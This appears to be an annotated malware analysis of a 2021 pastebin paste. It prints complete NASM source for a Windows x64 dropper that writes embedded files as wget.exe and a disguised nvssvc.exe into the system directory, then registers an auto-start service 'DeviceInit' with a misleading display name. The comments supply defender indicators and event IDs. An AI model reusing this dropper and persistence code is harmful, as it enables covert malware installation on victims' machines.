
Untitled

a guest
Jan 10th, 2021
  ; Analyst summary (from the visible listing): NASM-syntax source for a Windows x64
  ; program. It writes two embedded files into the Windows system directory and then
  ; registers one of them as a service. Arguments are passed in rcx/rdx/r8/r9 with
  ; further arguments on the stack from [rsp+20h].
  1. global start
  2.  
  3.  NULL equ 0
  4.  
  ; Access-mask and service-configuration values. In the visible code only
  ; SC_MANAGER_ALL_ACCESS and SERVICE_ALL_ACCESS are referenced by name; the
  ; CreateServiceA call passes numeric literals for the remaining fields.
  5.  SC_MANAGER_ALL_ACCESS equ 0xF003F
  6.  SERVICE_START equ 16
  7.  SERVICE_ALL_ACCESS equ 0xF01FF
  8.  SERVICE_INTERACTIVE_PROCESS equ 0x00000100
  9.  SERVICE_WIN32_OWN_PROCESS equ 0x00000010
  10.  SERVICE_AUTO_START equ 0x00000002
  11.  
  ; Imported Win32 APIs. Triage view of the import set: system-directory lookup,
  ; file create/write, and Service Control Manager calls (OpenSCManagerA and
  ; CreateServiceA). MessageBoxA, GetCommandLineA and GetModuleFileNameA are
  ; declared but never called in the visible code.
  12.  extern GetSystemDirectoryA
  13.  extern lstrcatA
  14.  extern CreateFileA
  15.  extern WriteFile
  16.  extern CloseHandle
  17.  extern MessageBoxA
  18.  extern ExitProcess
  19.  extern GetCommandLineA
  20.  extern GetModuleFileNameA
  21.  extern OpenSCManagerA
  22.  extern CreateServiceA
  23.  extern CloseServiceHandle
  24.  
  24.  
  ; Working storage and embedded payload data.
  25. section .data
  26.  
  ; 260-byte path buffer (the same 260 is passed as the size to GetSystemDirectoryA).
  27. Buffer db 260 dup (?)
  ; Handle returned by CreateFileA and the byte-count output slot for WriteFile.
  28. hFile resq 1
  29. pBytesWritten resq 1
  30.  
  ; Service Control Manager handle and created-service handle.
  31. SCH resq 1
  32. SVC resq 1
  33.  
  ; The code references `client` / `client_len` and `wget` / `wget_len`, none of which
  ; are defined in this listing; presumably the two include files supply the embedded
  ; file bytes and their lengths (the includes are not visible here, so confirm).
  34. %include 'client.inc'
  ; Single-quoted NASM strings are taken literally, so this is a backslash followed by
  ; "nvssvc.exe" (not a newline escape). Appended to the system directory path.
  ; NOTE(review): the file name resembles a vendor service binary; likely chosen to
  ; blend in, so treat the on-disk name as an indicator rather than as proof of origin.
  35. client_name  db '\nvssvc.exe',0
  36.  
  37. %include 'wget.inc'
  38. wget_name db '\wget.exe',0
  39.  
  ; Indicators for hunting: the service key name is "DeviceInit"; the second string is
  ; passed to CreateServiceA in the lpDisplayName position (r8), so it is the display
  ; name shown in service listings.
  40. SERVICE_NAME db 'DeviceInit',0
  41. SERVICE_DISP db 'This custom service is used in Connected Device Platform scripts',0
  42.  
  42.  
  ; Entry point. Two near-identical passes: each builds "<system directory>\<name>" in
  ; Buffer, creates that file, writes an embedded blob to it and closes the handle.
  ; Pass 1 writes `wget` as \wget.exe; pass 2 writes `client` as \nvssvc.exe. It then
  ; calls ServiceInit. No API return value is inspected anywhere in this routine.
  ; Defender note: both writes land in the Windows system directory, so file-creation
  ; telemetry (for example Sysmon event ID 11) on that directory from an unexpected
  ; process is a useful detection point; writing there normally requires elevation.
  43. section .code
  44. start:
  45.  
  46.     sub esp , 64                        ; stack adjustment for call arguments (written against esp)
  47.    
  ; --- pass 1: <system directory>\wget.exe ---
  48.     mov rdx , 260d                      ; uSize
  49.     mov rcx , Buffer                    ; lpBuffer
  50.     call GetSystemDirectoryA
  51.  
  52.     mov rdx , wget_name                 ; lpString2 = '\wget.exe'
  53.     mov rcx , Buffer                    ; lpString1 = system directory path
  54.     call lstrcatA
  55.  
  56.     mov qword [rsp+30h] , 0             ; hTemplateFile = NULL
  57.     mov qword [rsp+28h] , 0             ; dwFlagsAndAttributes = 0
  58.     mov qword [rsp+20h] , 2             ; dwCreationDisposition = 2 (CREATE_ALWAYS: overwrites an existing file)
  59.     xor r9 , r9                         ; lpSecurityAttributes = NULL
  60.     mov r8 , 3                          ; dwShareMode = FILE_SHARE_READ | FILE_SHARE_WRITE
  61.     mov edx , 0x80000000 + 0x40000000   ; dwDesiredAccess = GENERIC_READ | GENERIC_WRITE
  62.     mov ecx , Buffer                    ; lpFileName
  63.     call CreateFileA
  64.  
  65.     mov [hFile] , rax                   ; keep the handle for CloseHandle below
  66.  
  67.     mov qword [rsp+20h] , 0             ; lpOverlapped = NULL
  68.     mov r9 , pBytesWritten              ; lpNumberOfBytesWritten
  69.     mov r8 , [wget_len]                 ; nNumberOfBytesToWrite, loaded from wget_len
  70.     mov rdx , wget                      ; lpBuffer = embedded blob
  71.     mov rcx , rax                       ; hFile = CreateFileA result
  72.     call WriteFile
  73.  
  74.     mov rcx , [hFile]
  75.     call CloseHandle
  76.    
  77. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  78.  
  ; --- pass 2: <system directory>\nvssvc.exe ---
  ; Buffer is rebuilt from scratch, and its final contents are later passed to
  ; CreateServiceA as the service binary path.
  79.     mov rdx , 260d                      ; uSize
  80.     mov rcx , Buffer                    ; lpBuffer
  81.     call GetSystemDirectoryA
  82.  
  83.     mov rdx , client_name               ; lpString2 = '\nvssvc.exe'
  84.     mov rcx , Buffer                    ; lpString1 = system directory path
  85.     call lstrcatA
  86.  
  87.     mov qword [rsp+30h] , 0             ; hTemplateFile = NULL
  88.     mov qword [rsp+28h] , 0             ; dwFlagsAndAttributes = 0
  89.     mov qword [rsp+20h] , 2             ; dwCreationDisposition = 2 (CREATE_ALWAYS)
  90.     xor r9 , r9                         ; lpSecurityAttributes = NULL
  91.     mov r8 , 3                          ; dwShareMode = FILE_SHARE_READ | FILE_SHARE_WRITE
  92.     mov edx , 0x80000000 + 0x40000000   ; dwDesiredAccess = GENERIC_READ | GENERIC_WRITE
  93.     mov ecx , Buffer                    ; lpFileName
  94.     call CreateFileA
  95.  
  96.     mov [hFile] , rax                   ; keep the handle for CloseHandle below
  97.  
  98.     mov qword [rsp+20h] , 0             ; lpOverlapped = NULL
  99.     mov r9 , pBytesWritten              ; lpNumberOfBytesWritten
  100.     mov r8 , [client_len]               ; nNumberOfBytesToWrite, loaded from client_len
  101.     mov rdx , client                    ; lpBuffer = embedded blob
  102.     mov rcx , rax                       ; hFile = CreateFileA result
  103.     call WriteFile
  104.  
  105.     mov rcx , [hFile]
  106.     call CloseHandle
  107.  
  ; ServiceInit is the label immediately below and ends in ExitProcess, so control does
  ; not come back here.
  108.     call ServiceInit
  109.    
  110. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  111.  
  ; ServiceInit: opens the local Service Control Manager, registers a service named
  ; "DeviceInit" whose binary path is the current contents of Buffer (left by the caller
  ; as <system directory>\nvssvc.exe), closes both handles and exits the process.
  ; Return values are not inspected; the service is created but no start call is made
  ; in the visible code.
  ; Defender note: a successful CreateServiceA is recorded by the Service Control
  ; Manager as System log event ID 7045 (and Security event ID 4697 when that audit
  ; policy is enabled). The service name, display name and image path used here are
  ; the fields to match on. SC_MANAGER_ALL_ACCESS is normally granted only to
  ; administrators.
  112. ServiceInit:
  113.  
  114.     mov r8 , SC_MANAGER_ALL_ACCESS      ; dwDesiredAccess
  115.     mov rdx , 0                         ; lpDatabaseName = NULL (default database)
  116.     mov rcx , 0                         ; lpMachineName = NULL (local machine)
  117.     call OpenSCManagerA
  118.  
  119.     mov [SCH] , rax                     ; keep the SCM handle for cleanup
  120.  
  121.     mov qword [rsp+60h] , 0             ; lpPassword = NULL
  122.     mov qword [rsp+58h] , 0             ; lpServiceStartName = NULL (documented default: LocalSystem account)
  123.     mov qword [rsp+50h] , 0             ; lpDependencies = NULL
  124.     mov qword [rsp+48h] , 0             ; lpdwTagId = NULL
  125.     mov qword [rsp+40h] , 0             ; lpLoadOrderGroup = NULL
  126.     mov qword [rsp+38h] , Buffer        ; lpBinaryPathName = path built by the caller
  127.     mov qword [rsp+30h] , 1             ; dwErrorControl = 1
  128.     mov qword [rsp+28h] , 2             ; dwStartType = 2 (same value as SERVICE_AUTO_START: starts at boot)
  129.     mov qword [rsp+20h] , 110           ; dwServiceType slot; literal as written, no SERVICE_* name referenced
  130.     mov r9 , SERVICE_ALL_ACCESS         ; dwDesiredAccess
  131.     mov r8 , SERVICE_DISP               ; lpDisplayName
  132.     mov rdx , SERVICE_NAME              ; lpServiceName = 'DeviceInit'
  133.     mov rcx , rax                       ; hSCManager = OpenSCManagerA result
  134.     call CreateServiceA
  135.  
  136.     mov [SVC] , rax                     ; keep the service handle for cleanup
  137.  
  138.     mov rcx , [SCH]
  139.     call CloseServiceHandle
  140.    
  141.     mov rcx , [SVC]
  142.     call CloseServiceHandle
  143.  
  144.     mov rcx , rax                       ; exit code = result of the last CloseServiceHandle
  145.     call ExitProcess